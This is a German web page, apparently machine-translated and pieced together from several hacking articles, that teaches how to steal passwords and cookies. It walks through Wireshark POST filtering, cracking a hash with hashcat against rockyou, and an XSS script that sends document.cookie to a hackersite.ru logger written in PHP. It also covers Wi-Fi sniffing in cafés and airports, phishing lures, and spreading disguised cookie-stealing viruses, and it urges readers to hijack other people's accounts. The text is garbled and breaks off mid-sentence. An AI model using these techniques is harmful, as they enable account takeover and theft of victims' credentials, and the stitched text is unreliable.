Vielen Benutzern ist nicht bewusst, dass diese Daten leicht abgefangen werden können, wenn sie bei der Registrierung oder Autorisierung auf einer geschlossenen Internetressource einen Benutzernamen und ein Passwort eingeben und dann die Eingabetaste drücken. Sehr oft werden sie ungesichert über das Netzwerk übertragen. Wenn die Site, bei der Sie sich anmelden möchten, das HTTP-Protokoll verwendet, ist es daher sehr einfach, diesen Datenverkehr zu erfassen und zu analysieren mit Wireshark und dann mithilfe spezieller Filter und Programme das Passwort finden und entschlüsseln.

Der beste Ort zum Abfangen von Passwörtern ist der Kern des Netzwerks, wo der Datenverkehr aller Benutzer an geschlossene Ressourcen (z. B. E-Mail) oder vor den Router geht, um auf das Internet zuzugreifen, wenn er sich bei externen Ressourcen registriert. Wir stellen einen Spiegel auf und sind bereit, uns wie ein Hacker zu fühlen.

Schritt 1. Installieren und starten Sie Wireshark, um den Datenverkehr zu erfassen

Manchmal reicht es dazu aus, nur die Schnittstelle auszuwählen, über die wir den Datenverkehr erfassen möchten, und auf die Schaltfläche „Start“ zu klicken. In unserem Fall erfassen wir über ein drahtloses Netzwerk.

Die Verkehrserfassung hat begonnen.

Schritt 2. Filtern des erfassten POST-Verkehrs

Wir öffnen den Browser und versuchen, uns mit einem Benutzernamen und einem Passwort bei einer Ressource anzumelden. Sobald der Autorisierungsprozess abgeschlossen ist und die Website geöffnet ist, beenden wir die Erfassung des Datenverkehrs in Wireshark. Öffnen Sie als Nächstes den Protokollanalysator und sehen Sie eine große Anzahl von Paketen. Hier geben die meisten IT-Experten auf, weil sie nicht wissen, was sie als nächstes tun sollen. Aber wir kennen und interessieren uns für bestimmte Pakete, die Folgendes enthalten Post-Daten, die beim Ausfüllen eines Formulars am Bildschirm auf unserem lokalen Rechner generiert und an gesendet werden Remote-Server wenn Sie im Browser auf die Schaltfläche „Anmelden“ oder „Autorisierung“ klicken.

Wir geben im Fenster einen speziellen Filter ein, um erfasste Pakete anzuzeigen: http.Anfrage.Methode == „POST"

Und wir sehen statt tausender Pakete nur eines mit den gesuchten Daten.

Schritt 3. Finden Sie den Benutzernamen und das Passwort des Benutzers

Klicken Sie schnell mit der rechten Maustaste und wählen Sie das Element aus dem Menü aus Folgen Sie TCP Steam

Danach erscheint in einem neuen Fenster Text, der den Inhalt der Seite im Code wiederherstellt. Suchen wir die Felder „Passwort“ und „Benutzer“, die dem Passwort und dem Benutzernamen entsprechen. In einigen Fällen sind beide Felder leicht lesbar und nicht einmal verschlüsselt. Wenn wir jedoch versuchen, den Datenverkehr beim Zugriff auf sehr bekannte Ressourcen wie Mail.ru, Facebook, VKontakte usw. zu erfassen, wird das Passwort verschlüsselt:

HTTP/1.1 302 gefunden

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Set-Cookie: Passwort= ; läuft ab=Do, 07.11.2024 23:52:21 GMT; path=/

Speicherort: login.php

Inhaltslänge: 0

Verbindung: schließen

Inhaltstyp: text/html; Zeichensatz=UTF-8

In unserem Fall also:

Benutzername: Netzwerkguru

Passwort:

Schritt 4. Bestimmen Sie den Codierungstyp zum Entschlüsseln des Passworts

Gehen Sie zum Beispiel auf die Website http://www.onlinehashcrack.com/hash-identification.php#res und geben Sie unser Passwort in das Identifikationsfenster ein. Mir wurde eine Liste der Kodierungsprotokolle in der Reihenfolge ihrer Priorität gegeben:

Schritt 5. Entschlüsseln des Benutzerpassworts

An in diesem Stadium Wir können das Hashcat-Dienstprogramm verwenden:

~# hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt

Als Ergebnis erhielten wir ein entschlüsseltes Passwort: simplepassword

So können wir mit Hilfe von Wireshark nicht nur Probleme beim Betrieb von Anwendungen und Diensten lösen, sondern uns auch als Hacker versuchen, indem wir Passwörter abfangen, die Benutzer in Webformulare eingeben. Sie können auch Passwörter für Benutzerpostfächer herausfinden, indem Sie einfache Filter verwenden, um Folgendes anzuzeigen:

• Das POP-Protokoll und der Filter sehen folgendermaßen aus: pop.request.command == "USER" || pop.request.command == "PASS"
• Das IMAP-Protokoll und der Filter lauten: imap.request enthält „login“
• SMTP-Protokoll und Sie müssen den folgenden Filter eingeben: smtp.req.command == "AUTH"

und ernstere Dienstprogramme zum Entschlüsseln des Kodierungsprotokolls.

Schritt 6: Was passiert, wenn der Datenverkehr verschlüsselt ist und HTTPS verwendet?

Zur Beantwortung dieser Frage gibt es mehrere Möglichkeiten.

Option 1: Stellen Sie eine Verbindung her, wenn die Verbindung zwischen dem Benutzer und dem Server unterbrochen ist, und erfassen Sie den Datenverkehr in dem Moment, in dem die Verbindung hergestellt wird (SSL-Handshake). Beim Verbindungsaufbau kann der Sitzungsschlüssel abgefangen werden.

Option 2: Sie können den HTTPS-Verkehr mithilfe der von Firefox oder Chrome aufgezeichneten Sitzungsschlüssel-Protokolldatei entschlüsseln. Dazu muss der Browser so konfiguriert sein, dass er diese Verschlüsselungsschlüssel in eine Protokolldatei schreibt (FireFox-basiertes Beispiel) und Sie sollten diese Protokolldatei erhalten. Im Wesentlichen müssen Sie die Sitzungsschlüsseldatei stehlen Festplatte ein anderer Benutzer (was illegal ist). Dann erfassen Sie den Datenverkehr und verwenden Sie den resultierenden Schlüssel, um ihn zu entschlüsseln.

Klärung. Wir sprechen über den Webbrowser einer Person, deren Passwort sie zu stehlen versucht. Wenn wir die Entschlüsselung unseres eigenen HTTPS-Verkehrs meinen und üben wollen, dann wird diese Strategie funktionieren. Wenn Sie versuchen, den HTTPS-Verkehr anderer Benutzer ohne Zugriff auf deren Computer zu entschlüsseln, wird dies nicht funktionieren – das ist sowohl Verschlüsselung als auch Datenschutz.

Nachdem Sie die Schlüssel gemäß Option 1 oder 2 erhalten haben, müssen Sie diese in WireShark registrieren:

1. Gehen Sie zum Menü Bearbeiten – Einstellungen – Protokolle – SSL.
2. Setzen Sie das Flag „SSL-Einträge über mehrere TCP-Segmente neu zusammensetzen“.
3. „RSA-Schlüsselliste“ und klicken Sie auf Bearbeiten.
4. Geben Sie die Daten in alle Felder ein und schreiben Sie den Pfad mit dem Schlüssel in die Datei

„Ein Smartphone mit Hacking-Tools? So etwas gibt es nicht“, hätten wir Ihnen noch vor Kurzem gesagt. Nur auf einigen Maemo war es möglich, einige der üblichen Tools zur Durchführung von Angriffen zu starten. Mittlerweile wurden viele bekannte Tools auf iOS und Android portiert und einige Hack-Tools wurden speziell für die mobile Umgebung geschrieben. Kann ein Smartphone bei Penetrationstests einen Laptop ersetzen? Wir beschlossen, es auszuprobieren.

ANDROID

Paket-Manager

Netzwerkscanner

Verkehrsmanipulation

Verkehrstunnelbau

Drahtloses Netzwerk

Prüfung von Webanwendungen

Verschiedene Dienstprogramme

Fernzugriff

iOS

Arbeiten mit dem System

Datenabfang

Analyse drahtloser Netzwerke

Netzwerkscanner

Fernbedienung

Passwort-Wiederherstellung

Ausnutzen von Schwachstellen

Was ist ein Cookie?

Es gibt einen Mechanismus, der es dem HTTP-Server ermöglicht, einige Textinformationen auf dem Computer des Benutzers zu speichern und dann darauf zuzugreifen. Diese Information wird als Cookie bezeichnet. Im Wesentlichen ist jedes Cookie ein Paar: der Name eines Parameters und sein Wert. Jedem Cookie wird außerdem die Domain zugeordnet, zu der es gehört. Aus Sicherheitsgründen darf der http-Server in allen Browsern nur auf das Cookie seiner Domain zugreifen. Darüber hinaus können Cookies ein Ablaufdatum haben. In diesem Fall bleiben sie bis zu diesem Datum auf dem Computer gespeichert, auch wenn Sie alle Browserfenster schließen.

Alle Mehrbenutzersysteme verwenden Cookies zur Identifizierung des Benutzers. Genauer gesagt, die aktuelle Verbindung des Benutzers zum Dienst, Benutzersitzung. Wenn jemand Ihre Cookies erkennt, kann er sich in Ihrem Namen beim System anmelden. Weil in momentan Nur sehr wenige Internetressourcen prüfen während einer Benutzersitzung, ob sich die IP-Adresse geändert hat.

Browserentwickler stellen keine integrierten Tools zum Bearbeiten von Cookies zur Verfügung. Sie können aber auch mit einem normalen Notizblock auskommen.

Windows-Registrierungseditor Version 5.00



@="C:\\IE_ext.htm"

Speichern Sie es unter dem Namen IE_ext.reg

Schritt 2: Fügen Sie mithilfe der erstellten Datei Änderungen zur Windows-Registrierung hinzu.

Schritt 3: Erstellen Sie eine Textdatei mit Text

< script language="javascript">
external.menuArguments.clipboardData.setData("Text" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= „testname=testvalue; path=/; domain=testdomain.ru“;
Alert(external.menuArguments.document.cookie);

Schritt 4: Wir gehen auf die Website, die uns interessiert.

Schritt 5: Klicken Sie mit der rechten Maustaste auf eine leere Stelle auf der Seite und wählen Sie den Menüpunkt aus „Arbeiten mit Cookies“. Erlauben Sie den Zugriff auf die Zwischenablage. Dein Cookie davon Webseite. Sie können ihren Notizblock einlegen und einen Blick darauf werfen.

Schritt 6: Um einige Cookies zu ändern, bearbeiten Sie die Datei C:\IE_ext.htm und ersetzen Sie sie Testname im Namen von Cookie, Testwert- über seine Bedeutung, testdomain.ru– zur Site-Domain. Fügen Sie bei Bedarf weitere ähnliche Zeilen hinzu. Zur einfacheren Kontrolle habe ich dem Skript die Ausgabe der aktuellen Cookies vor und nach der Änderung hinzugefügt: Alert(external.menuArguments.document.cookie);

Schritt 7: Führen Sie Schritt 5 erneut aus und aktualisieren Sie dann die Seite.

Fazit: Wir werden mit aktualisierten Cookies auf diese Internetressource zugreifen.

Wie stiehlt man Cookies mit JavaScript?

Gelingt es einem Angreifer, ein beliebiges JavaScript-Skript auf dem Computer des Opfers auszuführen, kann er die aktuellen Cookies sehr einfach auslesen. Beispiel:

var str= document.cookie;

Aber wird er sie auf seine Website übertragen können, da, wie ich bereits erwähnt habe, ein JavaScript-Skript ohne zusätzliche Bestätigung nicht auf eine Website zugreifen kann, die sich auf einer anderen Domain befindet? Es stellt sich heraus, dass ein JavaScript-Skript jedes Bild laden kann, das sich auf einem beliebigen http-Server befindet. Übertragen Sie gleichzeitig eventuelle Textinformationen der Download-Anfrage auf dieses Bild. Beispiel: http://hackersite.ru/xss.jpg?text_info Wenn Sie also diesen Code ausführen:

var img= neues Bild();

img.src= „http://hackersite.ru/xss.jpg?“+ encodeURI(document.cookie);

Wie gehe ich mit solchen Anfragen um, ein „Bild“ herunterzuladen?

Ein Angreifer muss lediglich ein Hosting mit PHP-Unterstützung finden und dort Code wie diesen platzieren:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Dann werden alle Anfrageparameter für dieses Skript in der Datei gespeichert log.txt. Es bleibt nur noch das zuvor beschriebene JavaScript-Skript zu ersetzen http://hackersite.ru/xss.jpg zum Pfad zu diesem PHP-Skript.

Ich habe nur die einfachste Möglichkeit gezeigt, XSS-Schwachstellen auszunutzen. Dies beweist jedoch, dass das Vorhandensein mindestens einer solchen Sicherheitslücke auf einer Mehrbenutzer-Internetseite es einem Angreifer ermöglichen kann, deren Ressourcen in Ihrem Namen zu nutzen.

Hallo, dieser kurze Artikel, eher eben Kurzbeschreibung Ich möchte mich widmen einfacher Weg Cookies abfangen Wi-Fi-Netzwerke. Ich werde Ihnen hier nicht sagen, was Cookies sind und warum sie benötigt werden, wenn eine Person daran interessiert ist, „Backwaren“ abzufangen; In einem drahtlosen Netzwerk sollte er meiner Meinung nach wissen, was es ist und warum er es braucht. Ich sage nur eines: Mithilfe dieser Dateien können Sie auf die Konten anderer Personen auf verschiedenen Websites zugreifen, bei denen Benutzer einen Authentifizierungsprozess durchlaufen müssen (z. B. mail.ru, vkontakte.ru usw.).

Also lasst uns anfangen. Zuerst müssen wir das drahtlose Netzwerk selbst finden, mit einem offenen Internet-Zugangs-Gateway, und es ist wünschenswert, dass dieses Netzwerk ziemlich viele Clients hat. Geeignet ist beispielsweise jedes Netzwerk in großen Einkaufszentren, Flughäfen und verschiedenen Cafés; an solchen Orten nutzen die Leute normalerweise WLAN-Zugang im Internet, zum Lesen von E-Mails, zum Überprüfen von Konten auf verschiedenen Dating-Sites, zum Anzeigen von LJ und verschiedenen Foren. Das ist alles genau das, was wir brauchen. Nachdem wir uns für die Wahl des Netzwerkstandorts entschieden und bestimmte Stunden der maximalen Anzahl von Clients untersucht haben, gehen wir direkt zu den Kampfeinsätzen über. Dafür benötigen wir einen Laptop mit WLAN-Adapter, und eine bestimmte Reihe von Programmen. In meinem Fall habe ich verwendet Acer-Laptop Aspire 3610, D-Link DWL G650 Client-WLAN-Karte und BackTrack3-Betriebssystem installiert.

Ich empfehle Ihnen, dieses Betriebssystem zu verwenden, da es bereits alle Programme enthält, die Sie möglicherweise benötigen, und der wichtigste Vorteil darin besteht, dass Sie Backtrack nicht auf Ihrem installieren müssen Festplatte, können Sie dieses Betriebssystem direkt von einer CD oder einem Flash-Laufwerk starten.

Kommen wir nun zur notwendigen Software. Ich habe Kismet zur Netzwerkerkennung und WifiZoo zum Abfangen von Cookies verwendet. Ich werde ausführlich auf das zweite Programm eingehen. WifiZoo ist ein passiver Funkwellenscanner und sammelt ziemlich viel nützliche Informationen, wie zum Beispiel: POP3, SMTP-Verkehr, http-Cookies/Authinfo, MSN, FTP-Anmeldeinformationen, Telnet-Netzwerkverkehr, NBT usw. Der einzige Nachteil dieses Programms ist das Fehlen eines Channel-Hopping-Modus, WifiZoo hört nur zu drahtlose Schnittstelle und kann sozusagen nicht von Kanal zu Kanal springen. Dieser Nachteil wird jedoch durch ein anderes Programm, Kismet, ausgeglichen, das diesen Modus unterstützt. Um WifiZoo zu starten, benötigen Sie:

• Python
• unheimlich
• Kismet

Starten wir also das Programm, starten wir zunächst Kismet, um den Channel-Hopping-Modus zu unterstützen, und starten dann direkt WifiZoo. Das folgende Fenster sollte vor Ihnen erscheinen:

Jetzt müssen Sie nur noch warten, bis Sie etwas abfangen. Alles, was das Programm abfängt, finden Sie in den Protokollen, die sich im Verzeichnis mit dem Programm /logs/ befinden. Sie können auch eine GUI-Schnittstelle starten, die automatisch eine Verbindung zu http unter 127.0.0.1:8000 herstellt

Ich werde nicht über alle Funktionen dieses wunderbaren Programms schreiben, ich denke, Sie werden die anderen Funktionen selbst herausfinden, und da wir uns im Moment nur für Cookies interessieren. Klicken Sie auf den Link mit der Aufschrift „Cookies“ und sehen Sie, was wir abgefangen haben:

Möglichkeiten, Kekse zu stehlen

Diese Hacking-Methode, das Stehlen von Cookies, funktioniert hervorragend und wird von vielen Hackern verwendet. Wenn Sie es auch ausprobieren möchten, aber nicht wissen, was Sie tun sollen, lesen Sie unsere Empfehlungen.

Was sind Cookies?

Hierbei handelt es sich um Informationen über den Besuch eines Benutzers auf einer bestimmten Website. Es wird separat aufbewahrt Text dokument. Dort finden Sie vielfältige Informationen. Einschließlich Logins, Passwörter, Adressen Postfächer und Telefonnummern. Deshalb versuchen Einbrecher, an diese Dokumente zu gelangen. Um die benötigten Materialien zu stehlen, greifen Hacker auf unterschiedliche Methoden zurück.

Möglichkeiten, Kekse zu stehlen

XSS-Sicherheitslücke

Es kann auf jeder Website gefunden und verwendet werden. Wenn ein Spezialist eine Schwachstelle findet, setzt er sie um Sondercode. Je nach Verwendungszweck sind die Codes unterschiedlich; sie werden für eine bestimmte Ressource geschrieben. Wenn ein Benutzer diese Seite besucht und aktualisiert, werden alle Änderungen übernommen. Der Code beginnt zu wirken – er wird in den Computer des Opfers eingebettet und sammelt alles notwendige Informationen aus dem Browser.

Um Code einzuführen, können Sie jede Art von Schwachstelle nutzen – einen Fehler in einer Webressource, in einem Browser oder in einem Computersystem.

Es gibt zwei Arten von XSS-Angriffen:

Passiv - an das Seitenskript weitergeleitet. In diesem Fall müssen Sie nach Schwachstellen in Seitenelementen suchen. Zum Beispiel eine Dialogregisterkarte, ein Suchfeld, ein Videokatalog usw.

Aktiv - Sie sollten auf dem Server danach suchen. Sie sind besonders häufig in verschiedenen Foren, Blogs und Chats anzutreffen.

Wie kann man eine Person dazu zwingen, XSS anzuwenden?

Die Aufgabe ist nicht einfach, denn um den Code zu aktivieren, muss man oft auf den Link damit klicken. Sie können den Link maskieren und ihn zusammen mit einem interessanten Angebot per E-Mail versenden. Bieten Sie beispielsweise einen großen Rabatt in einem Online-Shop an. Das alles können Sie auch im Bild umsetzen. Der Benutzer wird es höchstwahrscheinlich sehen und nichts vermuten.

Installation eines Sniffers

Dies ist eine Implementierung Spezialprogramme um den Datenverkehr auf dem Gerät einer anderen Person zu überwachen. Mit dem Sniffer können Sie übertragene Sitzungen mit den Daten anderer Personen abfangen. Auf diese Weise können Sie alle Logins und Passwörter, Adressen usw. abrufen wichtige Informationen vom Benutzer über das Netzwerk übertragen werden. In diesem Fall werden Angriffe am häufigsten auf ungeschützte HTTP-Daten ausgeführt. Ungesichertes WLAN eignet sich hierfür gut.

Es gibt mehrere Möglichkeiten, einen Sniffer zu implementieren:

• Datenverkehr kopieren;
• Datenanalyse mittels Traffic-Attacken;
• Abhören von Schnittstellen;
• Einführung eines Sniffers in eine Kanalunterbrechung.

Cookies mithilfe eines Virus stehlen

Experten raten davon ab, Cookies zu verwenden, es sei denn, es besteht ein besonderer Bedarf. Wenn es möglich ist, sie zu deaktivieren, ist es besser, dies zu tun. Dies liegt daran, dass Cookies sehr anfällig sind. Sie werden oft von Kriminellen gestohlen. Aus diesen Dateien können zahlreiche persönliche Informationen gewonnen werden. vertrauliche Informationen, die gegen eine Person verwendet wird. Die gefährlichste Art von Dateien sind diejenigen, die auf dem System verbleiben, nachdem die Sitzung bereits beendet ist.

Cookies werden häufig mithilfe eines Virenprogramms gestohlen. Das geht ganz einfach. In jedes sichere Dienstprogramm ist ein Virus eingebettet, der bestimmte Materialien auf dem Computer sammelt. Das Virenprogramm wird mit dem Server seines Besitzers verbunden. Das Programm muss so konfiguriert sein, dass der Browser es als Proxyserver verwendet.

Sobald das Programm den PC des Opfers erreicht, beginnt es automatisch damit, alle gespeicherten Daten zu sammeln und an Sie zu senden.

Viren sind unterschiedlich, ihre Funktionen können sich auch unterscheiden. Bei einigen können Sie den Browser vollständig steuern und alle Informationen anzeigen. Andere sind in der Lage, geschützte Materialien zu stehlen. Wieder andere sammeln nur ungesicherte Daten.

Möglicherweise haben Sie Schwierigkeiten, ein Virenprogramm auf den Computer einer anderen Person einzuschleusen. Es ist notwendig, den Benutzer zu zwingen, es herunterzuladen und auszuführen. Hier können Sie ihm entweder einen Brief mit einem Link zum Programm schicken oder das Programm als sicher ausgeben und darauf warten, dass die Person es von Ihrer Website herunterlädt.

Wie schützt man Cookies vor Diebstahl?

Die meisten Webressourcen sind nicht ausreichend geschützt. Hacker finden auf diesen Plattformen leicht Schwachstellen und Fehler.

Cookie-Schutzregeln:

1. Verknüpfen Sie die Computer-ID mit der aktuellen Sitzung. Wenn Sie sich dann über ein Drittgerät auf der Website anmelden, wird eine neue Sitzung gestartet und die Daten der vorherigen Sitzung werden nicht abgerufen.
2. Verknüpfen Sie die Sitzung mit dem Browser. Es funktioniert das gleiche Prinzip wie im vorherigen Absatz.
3. Über das Netzwerk gesendete Parameter verschlüsseln. Dann sind die im Dokument gespeicherten Informationen nicht verständlich. Es wird für denjenigen nutzlos sein, der es abgefangen hat. Diese Technik schützt Sie nicht zu 100 %; einige Spezialisten können alle Materialien entschlüsseln.
4. Erstellen Sie einen separaten Ordner für Bezeichner.

Wie finde ich mithilfe von Cookies das Passwort für das Konto einer anderen Person heraus?

Um an die Anmeldedaten einer anderen Person zu gelangen, müssen Sie zunächst zu der Datei gelangen, in der diese gespeichert wurden.

Für diejenigen, die es verwenden Mozilla Firefox Sie müssen zur Registerkarte „Extras“ gehen, die sich im Hauptmenü befindet. Als nächstes finden Sie in den Systemeinstellungen den Bereich „Schutz“, in dem Sie alle wichtigen Informationen zu Konten in sozialen Netzwerken suchen sollten. Alle Passwörter sind ausgeblendet, klicken Sie also auf die Schaltfläche „Anzeigen“. Sie können den Schutz sofort installieren und einen speziellen Code eingeben. Dann wird niemand außer Ihnen diese Informationen erhalten.

In Opera sind nur Benutzernamen öffentlich zugänglich. Aber im Menü finden Sie einen Passwort-Manager und können alle auf Ihrem Computer gespeicherten Daten einsehen. Volle Liste steht im Manager. Um Zugriff auf Passwörter zu erhalten, müssen Sie eine zusätzliche Erweiterung installieren.

IN Google Chrome Alle diese Materialien können in den erweiterten Einstellungen angezeigt werden. Es gibt eine Registerkarte mit allen gespeicherten Cookies.

Leider, Standardbrowser Internet Explorer verfügt nicht über solche Funktionen. Um Informationen über die Webplattformen herauszufinden, die der PC-Besitzer besucht, müssen Sie ein spezielles Programm herunterladen. Sie können es kostenlos im Internet finden, es ist völlig sicher, aber es ist besser, es von vertrauenswürdigen Quellen herunterzuladen. Vergessen Sie nicht, dass jedes Programm von einem Antivirenprogramm gescannt werden muss. Dies gilt insbesondere für Dienstprogramme, die mit Passwörtern arbeiten.

Diese Technik eignet sich nur für Personen, die physischen Zugriff auf den Computer des Opfers haben. Sie können auch das Passwort einer anderen Person herausfinden, wenn sich die Person über Ihren PC bei der Plattform angemeldet und ihre Daten gespeichert hat.

Programme zum Stehlen von Cookies

Es gibt viele Hacker-Foren im Internet, in denen Hacker miteinander kommunizieren. Die Leute gehen dorthin in der Hoffnung, kostenlose Hilfe zu bekommen. Dort finden Sie eine Vielzahl verschiedener Hacking-Programme. Wir möchten Sie warnen, dass Sie diesen Programmen nicht vertrauen sollten. Dienstprogramme zum Remote-Stehlen von Cookies vom Gerät einer anderen Person sind Attrappen oder Virenprogramme. Wenn Sie diese Software auf Ihren PC herunterladen, tappen Sie höchstwahrscheinlich in die Falle eines Betrügers. Betrüger veröffentlichen Programme kostenlos. Dadurch verbreiten sie Virensoftware und erlangen die Kontrolle über fremde PCs. Im Allgemeinen handelt es sich bei solchen Programmen um Betrug, das erkennen Sie an der Benutzeroberfläche und dem Inhalt. Wenn Sie eine Software zum Extrahieren von Dateien verwenden, sollten Sie es mit Sniffer-Programmen tun. Natürlich ist ihre Verwendung nicht so einfach. Und im Internet einen guten Schnüffler zu finden, ist nicht einfach. Aber solche Software gibt es bei Spezialisten, die sie Ihnen für Geld verkaufen können. Denken Sie daran, dass es viele Betrüger gibt, von denen jeder seine eigenen Tricks hat. Sie sollten nur vertrauenswürdigen Hackern vertrauen, die einen guten Ruf haben, über Bewertungen verfügen und über eine eigene Website verfügen.

Abschließend möchte ich darauf hinweisen, dass der Diebstahl von Cookies eine wirklich wirksame Methode ist, deren Wirksamkeit sehr hoch ist. Wenn Sie das Profil einer Person in einem sozialen Netzwerk oder Instant Messenger hacken möchten, sollten Sie diese Option unbedingt in Betracht ziehen. Diese Methode funktioniert am besten, wenn Sie den Computer des Opfers verwenden können. Es ist viel schwieriger, Materialien aus der Ferne zu beschaffen, aber Sie können unsere Tipps nutzen und versuchen, diese Methode in die Praxis umzusetzen.

Im Kapitel